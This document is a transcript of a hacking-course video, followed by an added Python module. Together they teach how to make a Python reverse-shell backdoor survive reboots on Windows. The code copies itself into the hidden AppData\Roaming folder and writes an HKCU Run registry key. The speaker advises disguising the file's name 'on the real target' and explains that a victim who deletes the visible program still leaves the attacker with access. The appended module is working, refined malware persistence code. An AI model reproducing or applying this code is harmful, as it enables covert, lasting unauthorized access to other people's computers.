1 00:00:00,390 --> 00:00:02,190 Hello everybody and welcome back.
2 00:00:02,190 --> 00:00:08,370 And right now let's actually start off by coding that part of persistence of our backdoor.
3 00:00:08,580 --> 00:00:14,360 So the first thing we want to do is import two libraries into our reverse shell.
4 00:00:14,460 --> 00:00:16,890 The... the first library is actually
5 00:00:19,860 --> 00:00:20,960 the os library.
6 00:00:20,970 --> 00:00:23,000 So we already used it before.
7 00:00:23,100 --> 00:00:29,010 As I showed you in the Python basics, if you want to clear your screen, for example, you need to import
8 00:00:29,070 --> 00:00:30,400 the os library.
9 00:00:30,420 --> 00:00:35,680 So just go to the upper part of your reverse_shell.py program and import os.
10 00:00:35,790 --> 00:00:38,580 The next thing you want to import is import shutil.
11 00:00:38,720 --> 00:00:45,150 Now this is the library where we have the function which allows us to self-copy the file that we
12 00:00:45,330 --> 00:00:47,760 are running into a different directory.
13 00:00:47,760 --> 00:00:50,850 So that is also something that we want to import.
14 00:00:50,880 --> 00:00:54,600 And the third thing you want to import is the sys library.
15 00:00:54,600 --> 00:00:58,380 So import sys. Now we will need
16 00:00:58,380 --> 00:01:02,190 this... this is part of this library, in order to use the shutil
17 00:01:02,190 --> 00:01:03,740 .copyfile function in
18 00:01:03,840 --> 00:01:08,560 and in order to copy our file into the different executable.
19 00:01:08,610 --> 00:01:09,780 Now I'll show you what I mean.
20 00:01:09,780 --> 00:01:15,890 So just for now import these three libraries and let's scroll down to the beginning of our program.
21 00:01:16,050 --> 00:01:19,890 Now what you want... where you want to call this is right at the beginning of it.
22 00:01:19,920 --> 00:01:27,660 So we want to perform this type of the self-copying file and creating registry key even before we actually
23 00:01:28,620 --> 00:01:30,210 perform the connection function.
24 00:01:30,240 --> 00:01:38,330 So what we want to do is make a variable called location for now.
25 00:01:38,350 --> 00:01:46,660 So location equals... what we will do right now is we will set up a location where to self-copy, or to
26 00:01:46,660 --> 00:01:50,670 basically make a copy of our backdoor to, which directory.
27 00:01:50,680 --> 00:01:53,560 So we will use the AppData directory.
28 00:01:53,560 --> 00:01:59,200 The reason why we are using the AppData, or however we want to call it, directory is because it is a hidden
29 00:01:59,200 --> 00:02:02,080 directory that most of the users can't even find.
30 00:02:02,080 --> 00:02:07,030 So in order for you to go to it you just basically open your command prompt.
31 00:02:07,030 --> 00:02:11,670 Make sure you're on your... on your account, not on Desktop or somewhere like that.
32 00:02:11,740 --> 00:02:16,640 Back out to your account directory and then you can just cd to this AppData.
33 00:02:16,900 --> 00:02:21,370 And there you have three other directories, which is Local, LocalLow and Roaming.
34 00:02:21,370 --> 00:02:29,580 Now we will be copying our file into the Roaming directory, which is also a hidden directory.
35 00:02:30,700 --> 00:02:35,650 So cd to this Roaming, and right here we will have our file.
36 00:02:36,190 --> 00:02:41,230 So this is the directory; I can just show you a little bit better where we will be copying the file.
37 00:02:41,230 --> 00:02:45,180 So this will be our location of our copied backdoor.
38 00:02:45,340 --> 00:02:48,050 So let us start coding that.
39 00:02:48,160 --> 00:02:56,260 Now the os library allows us to actually specify this path on... on any PC we run this.
40 00:02:56,290 --> 00:03:02,770 So this means that, for example, you will not know how you... how your target account is called.
41 00:03:02,770 --> 00:03:09,910 So you will not be able to actually specify the path itself into your code; you will need to specify
42 00:03:10,060 --> 00:03:17,740 the function which allows us to actually change that part of the account on any PC that we run this
43 00:03:17,740 --> 00:03:18,520 on.
44 00:03:18,520 --> 00:03:24,220 Now what I mean by that is that whoever runs this on their Windows PC, we will be able to execute this
45 00:03:24,220 --> 00:03:37,120 function, since the os.environ and then open brackets APPDATA will itself bring us back the path
46 00:03:37,150 --> 00:03:39,730 to that folder, to that Roaming folder.
47 00:03:40,240 --> 00:03:46,160 So what... all we have to do right now for the location is we want to add the name of our file.
48 00:03:46,180 --> 00:03:50,860 Now you do not need to name the file the same as the file that you will compile.
49 00:03:50,860 --> 00:03:59,250 Let me just find the... the... this type of slash, so not the backward slash, you want the forward slash.
50 00:03:59,340 --> 00:04:05,600 You want to use the forward slash, type two slashes and then you will type the name of your file.
51 00:04:05,640 --> 00:04:12,330 You can name it anything you want, so we can name it backdoor so we know that it is our backdoor.
52 00:04:12,330 --> 00:04:18,090 Of course, if you're running this on the real target do not name it backdoor, it will be too obvious, and
53 00:04:18,180 --> 00:04:21,150 all you have to do is add .exe.
54 00:04:21,420 --> 00:04:29,490 Now this file right here, once you close the... the double quotes, will create a location, or basically will
55 00:04:29,490 --> 00:04:35,480 pass the path to the location of Roaming with our backdoor.exe.
56 00:04:35,520 --> 00:04:42,240 So after we copy it, if we type dir in the same directory that we typed dir in before, we will have
57 00:04:42,240 --> 00:04:48,720 backdoor.exe in this directory right here, and you will also have the backdoor.exe in your directory
58 00:04:48,720 --> 00:04:49,530 right here.
59 00:04:49,530 --> 00:04:51,580 Just this path right here will be different.
60 00:04:51,600 --> 00:04:56,050 This will be the name of your Windows account, but everything else will be this.
61 00:04:56,490 --> 00:05:06,450 So right now that we created the location we want to actually perform the copying... the copying of our file.
62 00:05:06,510 --> 00:05:09,280 So how we do that, we actually do that with the shutil.
63 00:05:09,290 --> 00:05:18,420 So shutil.copyfile, and let's just make a space so you can actually separate this part of code
64 00:05:18,420 --> 00:05:18,890 from this.
65 00:05:18,900 --> 00:05:25,410 So shutil.copyfile is the function that we will use, and what we will use is sys.executable
66 00:05:27,240 --> 00:05:29,520 comma location.
67 00:05:30,810 --> 00:05:37,380 This function right here will perform the copying of our executable, which is our reverse shell, to the
68 00:05:37,380 --> 00:05:40,470 location that we specified under this name.
69 00:05:40,470 --> 00:05:47,160 So for example, if our executable after we compile it is called reverse.exe and they run it, put it
70 00:05:47,160 --> 00:05:48,490 on Desktop and run it,
71 00:05:48,630 --> 00:05:56,190 it will make a copy right away of that same program to the AppData Roaming folder with the name
72 00:05:56,260 --> 00:06:00,960 backdoor.exe, and only after that it will perform the connection.
73 00:06:00,960 --> 00:06:10,560 So what we want to do right after this is basically perform the creation of the registry key for our
74 00:06:10,560 --> 00:06:16,980 file so it can actually be run every time the user starts their computer and logs into the...
75 00:06:16,980 --> 00:06:20,990 and logs into their Windows user account.
76 00:06:21,000 --> 00:06:28,950 So we will use the subprocess library that we already imported; as we can see right here, we use
77 00:06:28,950 --> 00:06:32,110 the same subprocess library for a different type of thing.
78 00:06:32,160 --> 00:06:39,720 Right now we want to type here subprocess.call and we want to call the command that will actually
79 00:06:40,710 --> 00:06:42,090 make a registry key.
80 00:06:42,090 --> 00:06:47,430 Now this is the command that you can run in the command prompt, so it will specify the same command to
81 00:06:47,430 --> 00:06:50,400 the same path where we want to store our registry key.
82 00:06:50,460 --> 00:06:54,810 So we want to type here reg add. Now rather than typing right...
83 00:06:54,810 --> 00:06:59,550 here is basically the syntax for adding the registry keys, so just follow up with me.
84 00:06:59,640 --> 00:07:08,250 So reg add HKCU. Now this HKCU basically stands for this, HKEY_CURRENT_USER.
85 00:07:08,490 --> 00:07:16,260 So we are specifying the path right now, so we want to type forward slash and then Software.
86 00:07:16,260 --> 00:07:20,100 I believe first of all it is Software, right.
87 00:07:20,400 --> 00:07:35,220 So HKCU, Software and then Microsoft, so slash Microsoft, forward slash, oops, Microsoft, and then forward
88 00:07:35,220 --> 00:07:36,780 slash once again.
89 00:07:37,010 --> 00:07:38,520 And let's see what's next.
90 00:07:38,730 --> 00:07:40,810 So after the Microsoft,
91 00:07:40,980 --> 00:07:44,040 the next thing is Windows.
92 00:07:44,040 --> 00:07:50,370 And then after the Windows we want to specify the current version, so slash Windows and then forward
93 00:07:50,370 --> 00:07:57,670 slash CurrentVersion, and then I believe the next one will be Run.
94 00:07:57,700 --> 00:08:03,400 So we also have to specify one more, which is the Run folder right here where we will store our
95 00:08:03,400 --> 00:08:05,680 registry key, so slash Run.
96 00:08:07,390 --> 00:08:12,320 And right after that what we want to do is perform the backward slash, so /v.
97 00:08:12,400 --> 00:08:18,640 This will be the name of our registry key; we can name it backdoor as well, so...
98 00:08:18,690 --> 00:08:20,860 So let's name it backdoor.
99 00:08:21,280 --> 00:08:25,840 This is a type, so REG_SZ, as we can see right here.
100 00:08:26,200 --> 00:08:33,220 This is... this is what we specify with the name of the registry keys, so we will have a backdoor name right
101 00:08:33,220 --> 00:08:33,970 here.
102 00:08:33,970 --> 00:08:36,400 And the type would be the same as other types as well.
103 00:08:36,400 --> 00:08:39,170 So REG_SZ.
104 00:08:39,190 --> 00:08:45,670 And right now what we want to specify afterwards is the data part, or basically the part where
105 00:08:45,670 --> 00:08:52,270 we specify the path to our backdoor that we self-copied into the AppData Roaming folder.
106 00:08:52,270 --> 00:08:54,680 So let us do that as well.
107 00:08:54,730 --> 00:09:00,730 We have to do it with the /d command, and then what we
108 00:09:00,740 --> 00:09:08,360 want to specify is actually the double quotes. Why we are specifying the double quotes is because right
109 00:09:08,390 --> 00:09:14,870 now we will add a string to this command; if we specify just a single quote it will already make our
110 00:09:14,870 --> 00:09:20,600 string, it will already close up our first apostrophe right here.
111 00:09:20,660 --> 00:09:26,150 So we do not want to do that; we want to add the double quotes right now and then a single quote, which
112 00:09:26,150 --> 00:09:34,010 of course is this apostrophe, then we want to add a plus location, which is the location now of our path.
113 00:09:34,010 --> 00:09:40,800 So location and then plus single quote, double quote and single quote.
114 00:09:41,090 --> 00:09:51,470 What we did with this is basically, right here as you can see, we had to mix... to use a mixture of the single
115 00:09:51,470 --> 00:09:54,410 and double quotes in order to specify the command correctly.
116 00:09:54,830 --> 00:10:03,150 So all we have to do right now is type here comma and then shell equals True, close our brackets and
117 00:10:03,150 --> 00:10:04,290 that should be it.
118 00:10:04,410 --> 00:10:08,790 Now shell equals True is the same as in this part right here, so we can see we also use the same
119 00:10:08,790 --> 00:10:10,080 subprocess library.
120 00:10:10,350 --> 00:10:18,310 And right now if we run this on the target PC it should create a registry key called backdoor with type
121 00:10:18,320 --> 00:10:26,400 REG_SZ with the location to the backdoor.exe file that we copied in our AppData
122 00:10:26,400 --> 00:10:27,010 folder.
123 00:10:27,120 --> 00:10:33,980 So there is another thing that we need to do before we actually compile this and run it.
124 00:10:33,980 --> 00:10:38,780 What we want to do is actually test if this location already exists.
125 00:10:38,780 --> 00:10:45,590 So for example, let's say you run this the first time on the target PC and they... and then all of this
126 00:10:45,630 --> 00:10:50,420 part... all part of this code happens, so we copy the file to the AppData.
127 00:10:50,430 --> 00:10:51,700 Then we add the registry key.
128 00:10:52,430 --> 00:10:57,910 But let's say they restart the PC once again, and it will perform the same function once again.
129 00:10:57,920 --> 00:11:03,050 So it will add another registry key, it will perform the same part right here with copying the file.
130 00:11:03,140 --> 00:11:04,510 We do not want to do that.
131 00:11:04,520 --> 00:11:06,080 We want to only do that
132 00:11:06,110 --> 00:11:10,520 the first time they run the program; there is really no point in doing this
133 00:11:10,550 --> 00:11:15,780 once again after every reboot and after every time they run the program.
134 00:11:15,800 --> 00:11:21,860 So what we want to do is, after this specifying of the location, since this is a variable we do not need
135 00:11:21,860 --> 00:11:23,150 to put it right here.
136 00:11:23,180 --> 00:11:26,360 We will use something called if not. Now,
137 00:11:26,390 --> 00:11:34,260 if not is basically the same as if, just right now we will specify if the path... if this path right here doesn't
138 00:11:34,340 --> 00:11:35,260 exist.
139 00:11:35,270 --> 00:11:41,690 This means that the program is being run for the first time, since if this path exists that means that
140 00:11:41,690 --> 00:11:47,090 the program has already been run before and the program has executed these two functions, since this
141 00:11:47,090 --> 00:11:48,360 path does exist.
142 00:11:48,560 --> 00:11:56,360 But if it doesn't exist, which we will check with the function os.path.exists, and then we want
143 00:11:56,360 --> 00:12:00,820 to specify what path, which is the location path.
144 00:12:01,610 --> 00:12:08,420 And then we put the two dots right here, and then if the path doesn't exist it means we are running it
145 00:12:08,420 --> 00:12:09,260 for the first time.
146 00:12:09,260 --> 00:12:15,770 So we want to perform the copying to the AppData folder and we want to perform the adding of our registry
147 00:12:15,770 --> 00:12:16,990 key.
148 00:12:17,000 --> 00:12:24,980 If it does exist it will just skip this code right here and it will go straight to the creation of the socket
149 00:12:25,010 --> 00:12:27,150 and then performing the connection.
150 00:12:27,200 --> 00:12:31,720 So let's see how this will work if we just save this right now.
151 00:12:31,770 --> 00:12:38,880 Ctrl+O to save and Ctrl+X to exit. Now let's perform the compilation once again; let me just find
152 00:12:38,880 --> 00:12:40,720 the command from the previous video.
153 00:12:40,730 --> 00:12:41,380 Here it is.
154 00:12:41,380 --> 00:12:42,880 So wine root
155 00:12:43,610 --> 00:12:48,420 and then the path to the... reverse_shell.py, --onefile and --noconsole.
156 00:12:48,710 --> 00:12:51,170 I click here Enter so we can compile our program.
157 00:12:54,770 --> 00:13:00,530 We wait for the compilation to finish, and then after it finishes we will copy it once again.
158 00:13:00,530 --> 00:13:03,320 So let's add our USB drive.
159 00:13:13,270 --> 00:13:16,830 I first have to delete the previous reverse shell from this folder.
160 00:13:16,840 --> 00:13:24,100 So let me just delete this right here, so I have to open a terminal and I will remove the reverse_shell
161 00:13:24,100 --> 00:13:26,390 .exe from the previous video.
162 00:13:26,490 --> 00:13:26,770 Good.
163 00:13:26,800 --> 00:13:30,210 So right now I can close this as well.
164 00:13:30,280 --> 00:13:34,820 Right now we want to go over to this directory right here.
165 00:13:35,530 --> 00:13:42,130 And we want to move, as usual, our reverse_shell.exe to media root
166 00:13:42,160 --> 00:13:45,550 and then the name of your USB drive.
167 00:13:45,550 --> 00:13:56,110 We copy it there, then... then we can delete all of the unnecessary things such as dist, build and spec, so
168 00:13:56,410 --> 00:14:00,830 what we want to do right now is the same as before, so unplug the USB drive.
169 00:14:02,520 --> 00:14:05,970 Open it on your Windows machine.
170 00:14:06,050 --> 00:14:13,340 Paste the reverse shell onto the desktop and then run the reverse shell now.
171 00:14:13,350 --> 00:14:17,760 Right now you can see that it is running the reverse shell, so everything went good.
172 00:14:18,030 --> 00:14:26,100 Now we can start up our server and listen for the incoming connections. Now since we know that our reverse
173 00:14:26,100 --> 00:14:32,130 shell tries to connect every 20 seconds, we should be good to go in about 20 seconds or less. As we can
174 00:14:32,130 --> 00:14:36,390 see, we already performed the connection and everything looks the same.
175 00:14:36,480 --> 00:14:44,580 But right now what we want to check is if the... the self-copying of the file worked and also if we successfully
176 00:14:44,580 --> 00:14:47,100 created the registry key for that file.
177 00:14:47,760 --> 00:14:52,590 So right now if I go to the command prompt we can see I'm still in the same directory.
178 00:14:52,650 --> 00:14:58,260 There is no backdoor.exe right here since we did... since I ran this dir command before actually
179 00:14:58,260 --> 00:14:59,310 running the program.
180 00:14:59,460 --> 00:15:05,130 And if we type dir once again right here, right now you will see we have our new file in here called
181 00:15:05,220 --> 00:15:11,730 backdoor.exe, which is the same size as our reverse shell since it is the same file, we just copied
182 00:15:11,730 --> 00:15:18,090 it into this directory. But also we want to make sure that the registry key is successfully created for
183 00:15:18,090 --> 00:15:19,110 this path right here.
184 00:15:19,110 --> 00:15:20,430 So if we go right here,
185 00:15:20,430 --> 00:15:27,150 press F5 to refresh, we can see our new registry key has been added, which is called backdoor, which
186 00:15:27,990 --> 00:15:34,370 points to the path of C, Users, AppData, Roaming and then backdoor.exe.
187 00:15:34,410 --> 00:15:41,100 So right now we know that this works successfully. Now every time the user reboots their machine, their
188 00:15:41,520 --> 00:15:47,550 backdoor will run at the startup or at the login of their account, and it will perform the connection
189 00:15:47,580 --> 00:15:48,840 every 20 seconds.
190 00:15:48,840 --> 00:15:54,690 So this means that we can successfully connect to their PC whenever we want, after as many times as
191 00:15:54,690 --> 00:15:57,160 they reboot the... the file.
192 00:15:57,180 --> 00:16:04,700 So right now if they, for example... let's quit this, and if they for example even delete this reverse shell right
193 00:16:04,700 --> 00:16:07,930 here, which for some reason once again doesn't want to delete.
194 00:16:07,940 --> 00:16:10,040 So we will have to fix that as well.
195 00:16:10,040 --> 00:16:16,760 So let's close it in our Task Manager. They, for example, notice that this reverse shell didn't open anything
196 00:16:17,060 --> 00:16:19,140 and they think this is a broken program.
197 00:16:19,250 --> 00:16:23,390 They delete it right here and then they think they're good to go.
198 00:16:23,420 --> 00:16:30,290 So... but we know that we still have the backdoor.exe in our Roaming folder and that we also have
199 00:16:30,290 --> 00:16:33,860 the registry key for it to run at the startup.
200 00:16:33,860 --> 00:16:41,100 So now we will be able to connect even after they reboot and delete the file. So that would be about it for
201 00:16:41,100 --> 00:16:41,720 this video.
202 00:16:41,780 --> 00:16:45,100 I hope you enjoyed it and I hope I see you in the next one.
203 00:16:45,110 --> 00:16:45,510 Bye.
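Added example (not part of the video or its course code): the persistence step the transcript builds, written as a small Python module so the logic can be exercised outside Windows. It follows the video's three pieces: the destination under %APPDATA% (which Windows resolves to the user's AppData\Roaming folder), the `reg add` of an HKCU ...\CurrentVersion\Run value, and the `os.path.exists` guard so the copy and registry write happen only once. Two things differ from the video and are my choices: the `reg add` arguments are passed as an argv list instead of a `shell=True` string, so the path needs none of the single/double-quote juggling shown above, and `/f` is added so an existing value is overwritten without a prompt. The file-system and process calls are injectable parameters so a test can run the function with fakes, and the `lab` username, the `reverse.exe` source name and the `fake_env` dictionary in the `__main__` block are constructed sample values. Note that a Run value under HKCU executes at that user's logon, not at boot.

```python
import ntpath
import os
import shutil
import subprocess
import sys

# The key the transcript types out: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run
RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"


def persistence_location(env, filename="backdoor.exe"):
    """Destination path for the self-copy, built from the APPDATA variable.

    `env` is passed in (normally os.environ) so the function can be run on a
    non-Windows host with a constructed environment. ntpath is used instead of
    os.path so the result is a Windows path regardless of the host OS.
    """
    appdata = env.get("APPDATA")
    if not appdata:
        raise KeyError("APPDATA is not set; this is not a Windows user environment")
    return ntpath.join(appdata, filename)


def reg_add_argv(location, value_name="backdoor"):
    """argv for `reg add`, as a list: no shell=True, so the path needs no manual quoting.

    /v is the value name, /t REG_SZ the type, /d the data (the path to run),
    /f (my addition, not in the video) overwrites an existing value silently.
    """
    return ["reg", "add", RUN_KEY, "/v", value_name, "/t", "REG_SZ", "/d", location, "/f"]


def install_persistence(location, source=None, *,
                        exists=os.path.exists, copy=shutil.copyfile, run=subprocess.call):
    """Copy the running executable to `location` and register it in the Run key, once.

    Returns True when the copy and registry write were performed and False when
    the copy already existed (a second run after reboot), matching the
    `if not os.path.exists(location):` guard from the video. The `exists`,
    `copy` and `run` callables default to the real ones and can be replaced by
    fakes for a dry run.
    """
    if source is None:
        source = sys.executable  # the running (PyInstaller-built) executable
    if exists(location):
        return False
    copy(source, location)
    rc = run(reg_add_argv(location))
    if rc != 0:
        raise RuntimeError(f"reg add failed with exit status {rc}")
    return True


if __name__ == "__main__":
    # Constructed environment so this dry run works off-Windows; on a real
    # Windows host you would pass os.environ and leave the callables at their defaults.
    fake_env = {"APPDATA": r"C:\Users\lab\AppData\Roaming"}
    loc = persistence_location(fake_env)
    # list2cmdline shows the exact command line Windows would hand to reg.exe,
    # with the path quoted automatically if it contains spaces.
    print(subprocess.list2cmdline(reg_add_argv(loc)))
    done = install_persistence(loc, source="reverse.exe",
                               exists=lambda p: False,
                               copy=lambda s, d: print(f"copy {s} -> {d}"),
                               run=lambda argv: 0)
    print("installed:", done)
```

On a real target the same value is what shows up under the Run key in regedit, which is also where a defender looks first; the `exists` guard only stops the copy from repeating, it does not make the value any less visible.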